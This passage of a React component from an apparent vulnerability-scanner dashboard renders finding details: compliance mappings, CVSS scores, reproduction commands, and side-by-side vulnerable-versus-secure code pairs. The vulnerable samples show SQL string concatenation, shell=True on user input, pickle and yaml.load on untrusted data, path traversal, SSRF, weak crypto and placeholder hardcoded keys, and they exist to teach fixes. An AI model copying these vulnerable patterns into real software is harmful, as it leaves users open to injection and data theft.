    mappings.push({ framework: 'OWASP', id: 'A05:2021', name: 'Security Misconfiguration' });
  }
  if (title.includes('crypto') || title.includes('encrypt') || title.includes('des')) {
    mappings.push({ framework: 'OWASP', id: 'A02:2021', name: 'Cryptographic Failures' });
  }
  if (title.includes('xss') || title.includes('cross-site')) {
    mappings.push({ framework: 'OWASP', id: 'A03:2021', name: 'Injection' });
  }
  if (title.includes('outdated') || title.includes('vulnerable')) {
    mappings.push({ framework: 'OWASP', id: 'A06:2021', name: 'Vulnerable and Outdated Components' });
  }
  
  // CWE mapping
  if (cweId.startsWith('CWE-')) {
    const cweNum = cweId.replace('CWE-', '');
    const cweNames = {
      '79': 'Improper Neutralization of Input During Web Page Generation',
      '89': 'Improper Neutralization of Special Elements used in SQL Command',
      '327': 'Use of a Broken or Risky Cryptographic Algorithm',
      '693': 'Protection Mechanism Failure',
      '798': 'Use of Hard-coded Credentials',
      '502': 'Deserialization of Untrusted Data',
    };
    mappings.push({ 
      framework: 'CWE', 
      id: cweId, 
      name: cweNames[cweNum] || 'See CWE Database' 
    });
  }
  
  // NIST mapping
  mappings.push({ framework: 'NIST', id: 'SC-8', name: 'Transmission Confidentiality and Integrity' });
  if (title.includes('auth') || title.includes('credential')) {
    mappings.push({ framework: 'NIST', id: 'IA-5', name: 'Authenticator Management' });
  }
  
  return mappings;
};

// Generate steps to reproduce
const generateStepsToReproduce = (finding) => {
  const fromApi = finding.reproduction_steps;
  if (Array.isArray(fromApi) && fromApi.length) {
    return fromApi.map((st) => ({ step: st.step, description: st.description, expected: st.expected, curl: st.command }));
  }
  const isDep = finding.installed_version && finding.installed_version !== 'N/A' && !finding.code_snippet;
  if (finding.url) {
    return [
      { step: 1, description: `Send the request to ${finding.url}`, expected: 'Endpoint responds', curl: `curl -i -X ${finding.method || 'GET'} '${finding.url}'` },
      { step: 2, description: 'Inspect the response for the reported behaviour', expected: 'The issue described in this finding is observable', curl: null },
    ];
  }
  if (isDep) {
    return [
      { step: 1, description: `Confirm ${finding.package_name}@${finding.installed_version} is installed`, expected: 'Package appears in the dependency tree', curl: `npm ls ${finding.package_name} --all` },
      { step: 2, description: 'Cross-check with the package manager audit', expected: 'The advisory is reported', curl: 'npm audit --omit=dev' },
    ];
  }
  const line = finding.line_number || 1;
  return [
    { step: 1, description: `Open ${finding.file_path}:${line} and read the flagged line in context`, expected: 'The described pattern is present', curl: `sed -n '${Math.max(1, line - 5)},${line + 5}p' ${finding.file_path}` },
    { step: 2, description: 'Review checklist: test/demo code? placeholder or env value? auth/validation upstream?', expected: "All answers 'no' means the finding is real", curl: null },
  ];
};

// Generate CVSS score based on vulnerability type
const generateCVSSData = (finding) => {
  const title = (finding.title || '').toLowerCase();
  const severity = (finding.severity || '').toLowerCase();
  
  let score, vector;
  
  if (severity === 'critical') {
    score = 9.8;
    vector = 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H';
  } else if (severity === 'high') {
    if (title.includes('encryption') || title.includes('crypto')) {
      score = 7.5;
      vector = 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N';
    } else {
      score = 8.1;
      vector = 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N';
    }
  } else if (severity === 'medium') {
    score = 5.3;
    vector = 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N';
  } else {
    score = 3.1;
    vector = 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N';
  }
  
  return { score, vector };
};

// Code Block Component
const CodeBlock = ({ code, language, title }) => {
  const [copied, setCopied] = useState(false);
  
  const handleCopy = () => {
    navigator.clipboard.writeText(code);
    setCopied(true);
    toast.success('Code copied to clipboard');
    setTimeout(() => setCopied(false), 2000);
  };
  
  return (
    <div className="bg-gray-900 rounded-lg overflow-hidden max-w-full">
      <div className="flex items-center justify-between px-3 py-2 bg-gray-800 text-gray-400 text-xs">
        <span>{title || language || 'Code'}</span>
        <Button 
          variant="ghost" 
          size="sm" 
          className="h-6 text-gray-400 hover:text-white"
          onClick={handleCopy}
        >
          {copied ? <CheckCircle className="w-3 h-3 mr-1" /> : <Copy className="w-3 h-3 mr-1" />}
          {copied ? 'Copied' : 'Copy'}
        </Button>
      </div>
      <pre className="p-3 text-xs overflow-x-auto text-gray-300">
        <code>{code}</code>
      </pre>
    </div>
  );
};

// Generate diff pairs (vulnerable → secure) per vulnerability type
const generateDiffPairs = (finding) => {
  const title = (finding.title || '').toLowerCase();
  const desc = (finding.description || '').toLowerCase();
  const cweId = (finding.cve_id || '').toUpperCase();
  const combined = `${title} ${desc} ${cweId.toLowerCase()}`;
  const pkg = finding.package_name || 'affected-package';
  const fixedVer = finding.fixed_version;

  if (combined.match(/sql.inject|cwe-89/)) {
    return [{
      label: 'SQL Injection Fix',
      language: 'python',
      vulnerable: `# String concatenation — VULNERABLE
query = f"SELECT * FROM users WHERE email = '{user_input}'"
cursor.execute(query)`,
      secure: `# Parameterized query — SECURE
query = "SELECT * FROM users WHERE email = %s"
cursor.execute(query, (user_input,))`
    }];
  }

  if (combined.match(/\bxss\b|cross.site.script|cwe-79/)) {
    return [{
      label: 'Cross-Site Scripting (XSS) Fix',
      language: 'javascript',
      vulnerable: `// Raw HTML insertion — VULNERABLE
element.innerHTML = userInput;
// React dangerouslySetInnerHTML with raw input
<div dangerouslySetInnerHTML={{__html: userInput}} />`,
      secure: `// Text content (auto-encodes) — SECURE
element.textContent = userInput;
// React auto-escapes JSX by default
<div>{userInput}</div>
// Use DOMPurify for rich text
import DOMPurify from 'dompurify';
<div dangerouslySetInnerHTML={{__html: DOMPurify.sanitize(userInput)}} />`
    }];
  }

  if (combined.match(/command.inject|os.inject|cwe-78|shell.inject/)) {
    return [{
      label: 'Command Injection Fix',
      language: 'python',
      vulnerable: `# Shell=True with user input — VULNERABLE
import subprocess
subprocess.call(f"ping {user_input}", shell=True)`,
      secure: `# Argument list, no shell — SECURE
import subprocess
subprocess.run(
    ["ping", "-c", "4", validated_host],
    shell=False, capture_output=True, timeout=10
)`
    }];
  }

  if (combined.match(/hardcod|hard.cod|cwe-798|secret.detect|credential|api.key.exposed|password.exposed/)) {
    return [{
      label: 'Hardcoded Credentials Fix',
      language: 'python',
      vulnerable: `# Hardcoded in source — VULNERABLE
DATABASE_PASSWORD = "SuperSecret123!"
API_KEY = "sk-live-abc123def456"`,
      secure: `# Environment variables — SECURE
import os
DATABASE_PASSWORD = os.environ["DATABASE_PASSWORD"]
API_KEY = os.environ["API_KEY"]
# .env file (not committed to git)`
    }];
  }

  if (combined.match(/deserializ|cwe-502|pickle|yaml.load/)) {
    return [{
      label: 'Insecure Deserialization Fix',
      language: 'python',
      vulnerable: `# Pickle with untrusted data — VULNERABLE
import pickle
data = pickle.loads(untrusted_bytes)

# yaml.load — VULNERABLE
data = yaml.load(untrusted_string)`,
      secure: `# JSON (no code execution) — SECURE
import json
data = json.loads(untrusted_string)

# yaml.safe_load — SECURE
data = yaml.safe_load(untrusted_string)`
    }];
  }

  if (combined.match(/path.traversal|directory.traversal|cwe-22|\.\.\/|lfi\b/)) {
    return [{
      label: 'Path Traversal Fix',
      language: 'python',
      vulnerable: `# Direct user input in path — VULNERABLE
filepath = os.path.join(UPLOAD_DIR, user_filename)
return open(filepath).read()`,
      secure: `# Canonical path validation — SECURE
from pathlib import Path
clean = os.path.basename(user_filename)
target = (Path(UPLOAD_DIR) / clean).resolve()
if not str(target).startswith(str(Path(UPLOAD_DIR).resolve())):
    raise ValueError("Path traversal blocked")
return open(target).read()`
    }];
  }

  if (combined.match(/\bssrf\b|server.side.request|cwe-918/)) {
    return [{
      label: 'SSRF Fix',
      language: 'python',
      vulnerable: `# Direct fetch of user URL — VULNERABLE
import requests
resp = requests.get(user_supplied_url)
return resp.text`,
      secure: `# Validate against allowlist — SECURE
import ipaddress, socket
from urllib.parse import urlparse
parsed = urlparse(user_supplied_url)
ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
if ip.is_private or ip.is_loopback:
    raise ValueError("Internal IP blocked")
resp = requests.get(user_supplied_url, timeout=5)`
    }];
  }

  if (combined.match(/\bheader\b|content.security.policy|\bcsp\b|x-frame|hsts|cwe-693/)) {
    return [{
      label: 'Security Headers Fix',
      language: 'nginx',
      vulnerable: `# Missing security headers — VULNERABLE
server {
    listen 80;
    location / {
        proxy_pass http://app:3000;
    }
}`,
      secure: `# With security headers — SECURE
server {
    listen 80;
    add_header X-Frame-Options "DENY" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header Content-Security-Policy "default-src 'self'" always;
    add_header Strict-Transport-Security "max-age=63072000" always;
    location / {
        proxy_pass http://app:3000;
    }
}`
    }];
  }

  if (combined.match(/\bdes\b|3des|rc4\b|md5|sha-?1\b|weak.crypt|cwe-327|cwe-328/)) {
    return [{
      label: 'Weak Cryptography Fix',
      language: 'python',
      vulnerable: `# Weak algorithm — VULNERABLE
import hashlib
digest = hashlib.md5(data).hexdigest()
# DES encryption
from Crypto.Cipher import DES
cipher = DES.new(key, DES.MODE_ECB)`,
      secure: `# Strong algorithm — SECURE
import hashlib
digest = hashlib.sha256(data).hexdigest()
# AES-256-GCM encryption
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(key)`
    }];
  }

  if (fixedVer) {
    return [{
      label: `Dependency Upgrade: ${pkg}`,
      language: 'bash',
      vulnerable: `# Current vulnerable version
${pkg}  (installed)`,
      secure: `# Patched version
${pkg}>=${fixedVer}
# Install: pip install '${pkg}>=${fixedVer}'
#      or: npm install ${pkg}@${fixedVer}`
    }];
  }

  return [];
};

// Diff Preview Component — side-by-side vulnerable vs secure
const DiffPreview = ({ pairs }) => {
  const [copiedSide, setCopiedSide] = useState(null);

  if (!pairs || pairs.length === 0) return null;

  const handleCopy = (text, side) => {
    navigator.clipboard.writeText(text);
    setCopiedSide(side);
    toast.success(`${side === 'secure' ? 'Secure' : 'Vulnerable'} code copied`);
    setTimeout(() => setCopiedSide(null), 2000);
  };

  const renderDiffLine = (line, type) => {
    if (!line.trim()) return <div className="h-4" />;
    const isComment = line.trim().startsWith('#') || line.trim().startsWith('//');
    return (
      <div className={`flex text-xs font-mono leading-5 ${
        type === 'remove' ? 'bg-red-950/40' : 
        type === 'add' ? 'bg-emerald-950/40' : ''
      }`}>
        <span className={`w-5 flex-shrink-0 text-center select-none ${
          type === 'remove' ? 'text-red-400' : 
          type === 'add' ? 'text-emerald-400' : 'text-gray-600'
        }`}>
          {type === 'remove' ? '-' : type === 'add' ? '+' : ' '}
        </span>
        <span className={`flex-1 px-2 ${
          isComment ? 'text-gray-500 italic' : 
          type === 'remove' ? 'text-red-300' : 
          type === 'add' ? 'text-emerald-300' : 'text-gray-300'
        }`}>
          {line}
        </span>
      </div>
    );
  };

  return (
    <div className="space-y-3">
      {pairs.map((pair, idx) => (
        <div key={idx} className="rounded-lg border border-gray-700 overflow-hidden">
          <div className="px-3 py-2 bg-gray-800 border-b border-gray-700 flex items-center justify-between">
            <span className="text-xs font-medium text-gray-300">{pair.label}</span>
            <span className="text-[10px] text-gray-500 uppercase tracking-wider">{pair.language}</span>
          </div>
          <div className="grid grid-cols-2 divide-x divide-gray-700">
            {/* Vulnerable side */}
            <div>
              <div className="flex items-center justify-between px-3 py-1.5 bg-red-950/30 border-b border-gray-700">
                <div className="flex items-center gap-1.5">
                  <Minus className="w-3 h-3 text-red-400" />
                  <span className="text-[10px] font-semibold text-red-400 uppercase tracking-wider">Vulnerable</span>
                </div>
                <Button variant="ghost" size="sm" className="h-5 px-1.5 text-gray-500 hover:text-red-300"
                  onClick={() => handleCopy(pair.vulnerable, 'vulnerable')}>
                  {copiedSide === 'vulnerable' ? <CheckCircle className="w-3 h-3" /> : <Copy className="w-3 h-3" />}
                </Button>
              </div>
              <div className="bg-gray-950 overflow-x-auto py-1">
                {pair.vulnerable.split('\n').map((line, i) => (
                  <div key={i}>{renderDiffLine(line, 'remove')}</div>
                ))}
              </div>
            </div>
            {/* Secure side */}
            <div>
              <div className="flex items-center justify-between px-3 py-1.5 bg-emerald-950/30 border-b border-gray-700">
                <div className="flex items-center gap-1.5">
                  <Plus className="w-3 h-3 text-emerald-400" />
                  <span className="text-[10px] font-semibold text-emerald-400 uppercase tracking-wider">Secure</span>
                </div>
                <Button variant="ghost" size="sm" className="h-5 px-1.5 text-gray-500 hover:text-emerald-300"
                  onClick={() => handleCopy(pair.secure, 'secure')}>
                  {copiedSide === 'secure' ? <CheckCircle className="w-3 h-3" /> : <Copy className="w-3 h-3" />}
                </Button>
              </div>
              <div className="bg-gray-950 overflow-x-auto py-1">
                {pair.secure.split('\n').map((line, i) => (
                  <div key={i}>{renderDiffLine(line, 'add')}</div>
                ))}
              </div>
            </div>
          </div>
        </div>
      ))}
    </div>
  );
};

// CVSS Score Display Component
const CVSSScoreDisplay = ({ cvssData }) => {
  const parsed = parseCVSSVector(cvssData.vector);
  
  return (
    <div className="space-y-4">
      <div className="flex items-center gap-4">
        <div className={`w-20 h-20 rounded-xl flex flex-col items-center justify-center ${getCVSSColor(cvssData.score)}`}>
          <span className="text-2xl font-bold">{cvssData.score}</span>
          <span className="text-xs opacity-80">CVSS v3.1</span>
        </div>
        <div>
          <p className="text-lg font-semibold">{getCVSSSeverity(cvssData.score)} Severity</p>
          <code className="text-xs text-gray-500 break-all">{cvssData.vector}</code>
        </div>
      </div>
      
      {parsed && (
        <div className="grid grid-cols-2 gap-2">
          {['AV', 'AC', 'PR', 'UI'].map(key => (
            <div key={key} className="flex justify-between text-sm p-2 bg-gray-50 rounded">
              <span className="text-gray-600">{CVSS_LABELS[key]?.label}:</span>
              <span className="font-medium">{CVSS_LABELS[key]?.[parsed[key]] || parsed[key]}</span>
            </div>
          ))}
        </div>
      )}
      
      <div className="border-t pt-3">
        <p className="text-sm font-medium mb-2">Impact</p>
        <div className="grid grid-cols-3 gap-2">
          {['C', 'I', 'A'].map(key => (
            <div key={key} className="text-center p-2 bg-gray-50 rounded">
              <p className="text-xs text-gray-500">
                {key === 'C' ? 'Confidentiality' : key === 'I' ? 'Integrity' : 'Availability'}
              </p>
              <p className={`font-medium ${
                parsed?.[key] === 'H' ? 'text-red-600' : 
                parsed?.[key] === 'L' ? 'text-yellow-600' : 'text-green-600'
              }`}>
                {CVSS_LABELS[key]?.[parsed?.[key]] || 'None'}
              </p>
            </div>
          ))}
        </div>
      </div>
    </div>
  );
};

// Main Enhanced Finding Detail Component
const EnhancedFindingDetail = ({ finding, onClose, scanId }) => {
  const [activeTab, setActiveTab] = useState('overview');
  const [expandedSections, setExpandedSections] = useState({
    cvss: true,
    attack: true,
    exploit: false,
    reproduce: false,
    diffPreview: true,
    remediation: true,
    compliance: true
  });
  const [aiAnalysis, setAiAnalysis] = useState(null);
  const [aiLoading, setAiLoading] = useState(false);
  const [aiError, setAiError] = useState(null);
  const [aiMeta, setAiMeta] = useState(null);
  // AI-generated code fix (Feb 2026) — powered by
  // ``POST /api/litesabre/scans/{scan_id}/findings/{finding_id}/ai-fix``.
  // ``ai_fix`` is persisted on the finding on the server side, so if the
  // user re-opens the detail we display it immediately without a new call.
  const [aiFix, setAiFix] = useState(finding?.ai_fix || null);
  const [aiFixLoading, setAiFixLoading] = useState(false);
  const [aiFixError, setAiFixError] = useState(null);

  const runAIFix = async () => {
    if (!finding?.id || !scanId) {
      setAiFixError('Cannot request AI fix — missing scan context.');
      return;
    }
    setAiFixLoading(true);
    setAiFixError(null);
    try {
      const token = localStorage.getItem('token');
      const tenantId = localStorage.getItem('currentTenantId') || '';
      const resp = await fetch(
        `${process.env.REACT_APP_BACKEND_URL}/api/litesabre/scans/${scanId}/findings/${finding.id}/ai-fix`,
        {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
            Authorization: `Bearer ${token}`,
            'X-Tenant-ID': tenantId,
          },
          body: JSON.stringify({}),
        },
      );
      const data = await resp.json();
      if (!resp.ok) {
        setAiFixError(data.detail || 'Failed to generate AI fix');
      } else {
        setAiFix(data.ai_fix);
      }
    } catch (e) {
      setAiFixError(e.message || 'Network error while generating AI fix');
    } finally {
      setAiFixLoading(false);
    }
  };

  const runAIAnalysis = async () => {
    if (!finding) return;
    setAiLoading(true);
    setAiError(null);
    setAiAnalysis(null);
    setAiMeta(null);
    try {
      const token = localStorage.getItem('token');
      const resp = await fetch(`${process.env.REACT_APP_BACKEND_URL}/api/ai/enrich-finding`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${token}` },
        body: JSON.stringify({ finding, scanner: 'litesabre' }),
      });
      const data = await resp.json();
      if (!resp.ok) {
        setAiError(data.detail || 'Failed to enrich finding');
      } else {
        setAiAnalysis(data.analysis);
        setAiMeta({ provider: data.provider, model: data.model, source: data.source });
      }
    } catch (e) {
      setAiError(e.message);
    } finally {
      setAiLoading(false);
    }
  };
  
  if (!finding) {
    return (
      <div className="flex flex-col items-center justify-center h-64 text-gray-400">
        <Shield className="w-12 h-12 mb-2 opacity-50" />
        <p>Select a vulnerability to see details</p>
      </div>
    );
  }
  
  const cvssData = generateCVSSData(finding);
  const attackScenario = generateAttackScenario(finding);
  const remediationSteps = generateRemediationSteps(finding);
  const diffPairs = generateDiffPairs(finding);
  const complianceMapping = generateComplianceMapping(finding);
  const stepsToReproduce = generateStepsToReproduce(finding);
  
  const toggleSection = (section) => {
    setExpandedSections(prev => ({ ...prev, [section]: !prev[section] }));
  };
  
  const getSeverityColor = (severity) => {
    switch (severity?.toLowerCase()) {
      case 'critical': return 'bg-red-100 text-red-800 border-red-200';
      case 'high': return 'bg-orange-100 text-orange-800 border-orange-200';
      case 'medium': return 'bg-yellow-100 text-yellow-800 border-yellow-200';
      case 'low': return 'bg-blue-100 text-blue-800 border-blue-200';
      default: return 'bg-gray-100 text-gray-800 border-gray-200';
    }
  };
  
  return (
    <div className="space-y-4 max-h-[calc(100vh-200px)] overflow-y-auto pr-2">
      {/* Header */}
      <div className="sticky top-0 bg-white z-10 pb-2 border-b">
        <div className="flex items-start justify-between">
          <div>
            <Badge className={getSeverityColor(finding.severity)}>
              {finding.severity?.toUpperCase()}
            </Badge>
            <h3 className="text-lg font-semibold mt-2">{finding.title}</h3>
            <p className="text-sm text-gray-500 font-mono">{finding.cve_id}</p>
          </div>
          {finding.cve_id && (
            <a
              href={finding.cve_id?.startsWith('CWE-') 
                ? `https://cwe.mitre.org/data/definitions/${finding.cve_id.replace('CWE-', '')}.html`
                : `https://nvd.nist.gov/vuln/detail/${finding.cve_id}`}
              target="_blank"
              rel="noopener noreferrer"
              className="text-indigo-600 hover:text-indigo-800"
            >
              <ExternalLink className="w-5 h-5" />
            </a>
          )}
        </div>
        {/* AI Ask button + result */}
        <div className="mt-3 flex items-center gap-2">
          <button
            data-testid="finding-ai-ask-btn"
            onClick={runAIAnalysis}
            disabled={aiLoading}
            className="inline-flex items-center gap-1.5 px-3 py-1.5 text-xs font-medium bg-indigo-600 text-white rounded-md hover:bg-indigo-700 disabled:opacity-60 disabled:cursor-not-allowed transition"
          >
            {aiLoading ? 'Analyzing with Claude...' : 'Ask AI (Claude Sonnet 4.5)'}
          </button>
          {aiMeta && (
            <span className="text-[10px] text-gray-500 font-mono">
              {aiMeta.provider}/{aiMeta.model} · {aiMeta.source === 'byok' ? 'your key' : 'Emergent'}
            </span>
          )}
        </div>
        {aiError && (
          <div data-testid="finding-ai-error" className="mt-2 p-2 rounded bg-red-50 text-red-700 text-xs">
            {aiError}
          </div>
        )}
        {aiAnalysis && (
          <div
            data-testid="finding-ai-analysis"
            className="mt-3 p-3 rounded-lg border border-indigo-200 bg-indigo-50/40 text-sm text-gray-800 whitespace-pre-wrap"
          >
            {aiAnalysis}
          </div>
        )}
      </div>
      
      {/* Package Info */}
      <div className="grid grid-cols-2 gap-3 p-3 bg-gray-50 rounded-lg">
        <div>
          <p className="text-xs text-gray-500">Package</p>
          <p className="font-mono text-sm">{finding.package_name}</p>
        </div>
        <div>
          <p className="text-xs text-gray-500">Installed Version</p>
          <p className="font-mono text-sm text-red-600">{finding.installed_version || 'N/A'}</p>
        </div>
        {finding.fixed_version && (
          <div>
            <p className="text-xs text-gray-500">Fixed In</p>
            <p className="font-mono text-sm text-green-600">{finding.fixed_version}</p>
          </div>
        )}
        {finding.file_path && (
          <div>
            <p className="text-xs text-gray-500">File</p>
            <p className="font-mono text-xs truncate">{finding.file_path}</p>
          </div>
        )}
      </div>
      
      {/* Manifest declaration — exact line where the vulnerable
          package + version are declared in the lockfile/manifest */}
      {finding.reachability && (
        <div
          className={`border rounded-lg p-3 flex items-center gap-3 ${
            finding.reachability === 'reachable' ? 'bg-red-50 border-red-300' :
            finding.reachability === 'likely_reachable' ? 'bg-orange-50 border-orange-300' :
            finding.reachability === 'unreachable' ? 'bg-emerald-50 border-emerald-300' :
            'bg-slate-50 border-slate-300'
          }`}
          data-testid="finding-reachability"
        >
          <span className={`w-2.5 h-2.5 rounded-full shrink-0 ${
            finding.reachability === 'reachable' ? 'bg-red-500' :
            finding.reachability === 'likely_reachable' ? 'bg-orange-500' :
            finding.reachability === 'unreachable' ? 'bg-emerald-500' :
            'bg-slate-400'
          }`} />
          <div className="flex-1">
            <div className="text-sm font-semibold uppercase tracking-wide">
              {finding.reachability === 'reachable' ? 'Reachable' :
               finding.reachability === 'likely_reachable' ? 'Likely reachable' :
               finding.reachability === 'unreachable' ? 'Unreachable' :
               'Reachability unknown'}
            </div>
            {finding.reachability_reason && (
              <div className="text-xs text-slate-600 mt-0.5">{finding.reachability_reason}</div>
            )}
          </div>
        </div>
      )}

      {/* Vulnerable code — mandatory 3-line snippet displayed on every
          finding that has ANY code anchor (dep: manifest_anchor;
          SAST/OWASP: code_snippet.code; secret: snippet). The user
          asked for max 3 lines so we truncate any longer snippet before
          rendering. */}
      {(() => {
        const rawSnippet =
          (finding.manifest_anchor && finding.manifest_anchor.snippet) ||
          (finding.code_snippet && finding.code_snippet.code) ||
          finding.snippet ||
          null;
        if (!rawSnippet && !finding.file_path) return null;
        const anchorFile =
          (finding.manifest_anchor && finding.manifest_anchor.file) ||
          finding.file_path ||
          null;
        const anchorLine =
          (finding.manifest_anchor && finding.manifest_anchor.line) ||
          (finding.code_snippet && finding.code_snippet.highlighted_line) ||
          finding.line_number ||
          finding.line ||
          null;
        // Cap to exactly 3 lines. If the backend already returned ≤3
        // this is a no-op; if it returned more (legacy scans) we trim
        // the top so the vulnerable middle line stays visible.
        const trimmed = rawSnippet
          ? rawSnippet.split('\n').slice(-3).join('\n')
          : '';
        return (
          <div
            className="border rounded-lg overflow-hidden border-red-300"
            data-testid="finding-vulnerable-code"
          >
            <div className="p-3 bg-red-50 flex items-center gap-2 border-b border-red-200">
              <Code className="w-4 h-4 text-red-700" />
              <span className="font-medium text-red-900">Vulnerable code</span>
              {anchorFile && (
                <span className="ml-auto font-mono text-xs text-red-700 truncate max-w-[60%]">
                  {anchorFile}{anchorLine ? `:${anchorLine}` : ''}
                </span>
              )}
            </div>
            {trimmed ? (
              <pre className="text-xs font-mono bg-slate-900 text-slate-100 p-3 overflow-x-auto whitespace-pre">
{trimmed}
              </pre>
            ) : (
              <p className="text-xs italic text-slate-500 p-3">
                Source content not captured for this finding — see file above.
              </p>
            )}
          </div>
        );
      })()}

      {finding.manifest_anchor && (
        <div className="border rounded-lg overflow-hidden" data-testid="finding-manifest-anchor">
          <div className="p-3 bg-amber-50 flex items-center gap-2 border-b border-amber-200">
            <FileText className="w-4 h-4 text-amber-700" />
            <span className="font-medium text-amber-900">Declared in manifest</span>
            <span className="ml-auto font-mono text-xs text-amber-700">
              {finding.manifest_anchor.file}:{finding.manifest_anchor.line}
            </span>
          </div>
          <div className="p-3 bg-white">
            <pre className="text-xs font-mono bg-slate-900 text-slate-100 p-3 rounded overflow-x-auto whitespace-pre">
{finding.manifest_anchor.snippet}
            </pre>
          </div>
        </div>
      )}

      {/* Call sites — every source-file location that imports/
          requires this vulnerable package. Empty list is hidden. */}
      {Array.isArray(finding.call_sites) && finding.call_sites.length > 0 && (
        <div className="border rounded-lg overflow-hidden" data-testid="finding-call-sites">
          <div className="p-3 bg-red-50 flex items-center gap-2 border-b border-red-200">
            <Code className="w-4 h-4 text-red-700" />
            <span className="font-medium text-red-900">
              Used at {finding.call_sites.length} call site{finding.call_sites.length === 1 ? '' : 's'}
            </span>
            <span className="ml-auto text-xs text-red-700">grep of source imports</span>
          </div>
          <div className="max-h-96 overflow-y-auto divide-y">
            {finding.call_sites.map((cs, i) => (
              <div key={`${cs.file}:${cs.line}:${i}`} className="p-3 bg-white hover:bg-slate-50">
                <div className="flex items-center justify-between mb-1">
                  <span className="font-mono text-xs text-slate-700 truncate">
                    {cs.file}<span className="text-slate-400">:{cs.line}</span>
                  </span>
                  {cs.statement && (
                    <code className="ml-2 text-[10px] text-red-700 bg-red-50 px-1.5 py-0.5 rounded truncate max-w-[45%]">
                      {cs.statement}
                    </code>
                  )}
                </div>
                <pre className="text-[11px] font-mono bg-slate-900 text-slate-100 p-2 rounded overflow-x-auto whitespace-pre">
{cs.snippet}
                </pre>
              </div>
            ))}
          </div>
        </div>
      )}
      
      {/* CVSS Score Breakdown */}
      <div className="border rounded-lg overflow-hidden">
        <button 
          className="w-full p-3 flex items-center justify-between bg-gray-50 hover:bg-gray-100 transition"
          onClick={() => toggleSection('cvss')}
        >
          <div className="flex items-center gap-2">
            <Target className="w-4 h-4 text-indigo-600" />
            <span className="font-medium">CVSS Score Breakdown</span>
          </div>
          {expandedSections.cvss ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
        </button>
        {expandedSections.cvss && (
          <div className="p-4">
            <CVSSScoreDisplay cvssData={cvssData} />
          </div>
        )}
      </div>
      
      {/* Description */}
      <div className="p-3 bg-gray-50 rounded-lg">
        <p className="text-sm text-gray-600">{finding.description || 'No description available.'}</p>
      </div>
      
      {/* Vulnerable Code Pattern */}
      {finding.code_snippet && (
        <div className="border rounded-lg overflow-hidden">
          <div className="p-3 bg-gray-50 flex items-center gap-2">
            <Code className="w-4 h-4 text-red-600" />
            <span className="font-medium">Vulnerable Code Pattern</span>
          </div>
          <div className="p-3">
            <CodeBlock 
              code={finding.code_snippet.code || finding.code_snippet} 
              language={finding.code_snippet.language || 'code'} 
              title="Source Code"
            />
          </div>
        </div>
      )}
      
      {/* Attack Scenario */}
      <div className="border rounded-lg overflow-hidden">
        <button 
          className="w-full p-3 flex items-center justify-between bg-red-50 hover:bg-red-100 transition"
          onClick={() => toggleSection('attack')}
        >
          <div className="flex items-center gap-2">
            <Zap className="w-4 h-4 text-red-600" />
            <span className="font-medium text-red-800">Attack Scenario</span>
          </div>
          {expandedSections.attack ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
        </button>
        {expandedSections.attack && (
          <div className="p-4 space-y-3">
            <p className="text-sm text-gray-700">{attackScenario.description}</p>
          </div>
        )}
      </div>
      
      {/* Exploitation Examples */}
      {attackScenario.exploits.length > 0 && (
        <div className="border rounded-lg overflow-hidden">
          <button 
            className="w-full p-3 flex items-center justify-between bg-orange-50 hover:bg-orange-100 transition"
            onClick={() => toggleSection('exploit')}
          >
            <div className="flex items-center gap-2">
              <AlertTriangle className="w-4 h-4 text-orange-600" />
              <span className="font-medium text-orange-800">Exploitation Examples</span>
            </div>
            {expandedSections.exploit ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
          </button>
          {expandedSections.exploit && (
            <div className="p-4 space-y-4">
              {attackScenario.exploits.map((exploit, idx) => (
                <div key={idx} className="border-l-4 border-orange-400 pl-3 space-y-2">
                  <h4 className="font-medium text-orange-800">{exploit.name}</h4>
                  <p className="text-sm text-gray-600">{exploit.description}</p>
                  
                  <div>
                    <p className="text-xs text-gray-500 mb-1">Payload Example:</p>
                    <CodeBlock code={exploit.payload} language="payload" />
                  </div>
                  
                  <div>
                    <p className="text-xs text-gray-500">Expected Result:</p>
                    <p className="text-sm text-red-600">{exploit.result}</p>
                  </div>
                  
                  {exploit.realCases.length > 0 && (
                    <div>
                      <p className="text-xs text-gray-500">Real-World Cases:</p>
                      <ul className="text-sm text-gray-700 list-disc list-inside">
                        {exploit.realCases.map((c, i) => <li key={i}>{c}</li>)}
                      </ul>
                    </div>
                  )}
                </div>
              ))}
            </div>
          )}
        </div>
      )}
      
      {/* Steps to Reproduce */}
      <div className="border rounded-lg overflow-hidden">
        <button 
          className="w-full p-3 flex items-center justify-between bg-blue-50 hover:bg-blue-100 transition"
          onClick={() => toggleSection('reproduce')}
        >
          <div className="flex items-center gap-2">
            <PlayCircle className="w-4 h-4 text-blue-600" />
            <span className="font-medium text-blue-800">Steps to Reproduce</span>
          </div>
          {expandedSections.reproduce ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
        </button>
        {expandedSections.reproduce && (
          <div className="p-4 space-y-4">
            {stepsToReproduce.map((step, idx) => (
              <div key={idx} className="flex gap-3">
                <div className="w-8 h-8 rounded-full bg-blue-100 flex items-center justify-center flex-shrink-0">
                  <span className="text-blue-700 font-medium">{step.step}</span>
                </div>
                <div className="flex-1 min-w-0" data-testid={`repro-step-${step.step}`}>
                  <p className="text-sm font-medium break-words">{step.description}</p>
                  <p className="text-xs text-gray-500 mt-1 break-words">Expected: {step.expected}</p>
                  {step.curl && (
                    <div className="mt-2 max-w-full overflow-x-auto">
                      <p className="text-xs text-gray-500 mb-1">Command</p>
                      <CodeBlock code={step.curl} language="bash" />
                    </div>
                  )}
                </div>
              </div>
            ))}
          </div>
        )}
      </div>
